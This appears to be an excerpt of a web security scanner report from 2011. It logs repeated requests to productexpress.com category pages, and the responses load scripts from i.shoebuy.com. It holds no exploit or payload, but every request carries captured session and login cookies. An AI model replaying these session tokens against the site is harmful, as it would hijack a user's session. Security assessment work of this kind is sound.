HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:34 GMT Server: Apache Set-Cookie: JSESSIONID=568C9932C468F740DBA4F22F477E01A8; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>K ...[SNIP]... <meta name="description" content="Buy kurt muller belts with a price guarantee and top rated customer service. You can compare multiple kurt muller belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /leather-goods-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:04:58 GMT Server: Apache Set-Cookie: JSESSIONID=EB41D4446000139BA8C30FFB1CD3BB56; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>L ...[SNIP]... a name="description" content="Buy leather goods belts with a price guarantee and top rated customer service. You can compare multiple leather goods belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /leather-island-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:22 GMT Server: Apache Set-Cookie: JSESSIONID=07B38E23FC5512108AE51EE16C384F37; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>L ...[SNIP]... name="description" content="Buy leather island belts with a price guarantee and top rated customer service. You can compare multiple leather island belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /levis-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:37 GMT Server: Apache Set-Cookie: JSESSIONID=6A8055478C7BE7B8297C8C824736E10F; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>L ...[SNIP]... <meta name="description" content="Buy levis belts with a price guarantee and top rated customer service. You can compare multiple levis belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /mens-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:39 GMT Server: Apache Set-Cookie: JSESSIONID=7684D5118555BB80323F732DCF7DD5C8; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>M ...[SNIP]... <meta name="description" content="Buy mens belts with a price guarantee and top rated customer service. You can compare multiple mens belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /mens-shoes.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:03:55 GMT Server: Apache Set-Cookie: JSESSIONID=532C6E1C2AA9953F6E9DA949B1E738DE; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>M ...[SNIP]... <meta name="description" content="Buy mens shoes with a price guarantee and top rated customer service. You can compare multiple mens shoes styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /mens.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:02:23 GMT Server: Apache Set-Cookie: JSESSIONID=A0377104C0A500DA4FD6ACA78528DE4E; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>M ...[SNIP]... <meta name="description" content="Buy mens with a price guarantee and top rated customer service. You can compare multiple mens styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /metal-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:59 GMT Server: Apache Set-Cookie: JSESSIONID=D9F1AE3E110D0CCE78F380A814F64F3C; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>M ...[SNIP]... <meta name="description" content="Buy metal belts with a price guarantee and top rated customer service. You can compare multiple metal belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /metal-mulisha-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:39 GMT Server: Apache Set-Cookie: JSESSIONID=0EEB5483E1238017121F172F65EC6764; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>M ...[SNIP]... a name="description" content="Buy metal mulisha belts with a price guarantee and top rated customer service. You can compare multiple metal mulisha belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /multicolored-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:30 GMT Server: Apache Set-Cookie: JSESSIONID=92434EDC2E078477869100E9F42BE8B6; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>M ...[SNIP]... eta name="description" content="Buy multicolored belts with a price guarantee and top rated customer service. You can compare multiple multicolored belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /navy-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:58 GMT Server: Apache Set-Cookie: JSESSIONID=8D9BD69A4999E724BCE5F6705BB611FD; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>N ...[SNIP]... <meta name="description" content="Buy navy belts with a price guarantee and top rated customer service. You can compare multiple navy belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /new-styles.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:03:38 GMT Server: Apache Set-Cookie: JSESSIONID=BDD54D52DCF667FD8737A63425816024; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>N ...[SNIP]... <meta name="description" content="Buy new styles with a price guarantee and top rated customer service. You can compare multiple new styles styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /off-white-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:59 GMT Server: Apache Set-Cookie: JSESSIONID=57C9F4878B47F7D6C301C4E3957CAD79; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>O ...[SNIP]... <meta name="description" content="Buy off white belts with a price guarantee and top rated customer service. You can compare multiple off white belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /pebble-grain-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:02 GMT Server: Apache Set-Cookie: JSESSIONID=EE6C47A9EA24CB17EAA3B395F06B834E; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>P ...[SNIP]... eta name="description" content="Buy pebble grain belts with a price guarantee and top rated customer service. You can compare multiple pebble grain belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /prints-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:38 GMT Server: Apache Set-Cookie: JSESSIONID=B578C2F9E433D6FF8347B05C36487484; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>P ...[SNIP]... <meta name="description" content="Buy prints belts with a price guarantee and top rated customer service. You can compare multiple prints belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /pull-up-leather-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:21 GMT Server: Apache Set-Cookie: JSESSIONID=32FEB8A5837C0779B8680573610C4B91; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
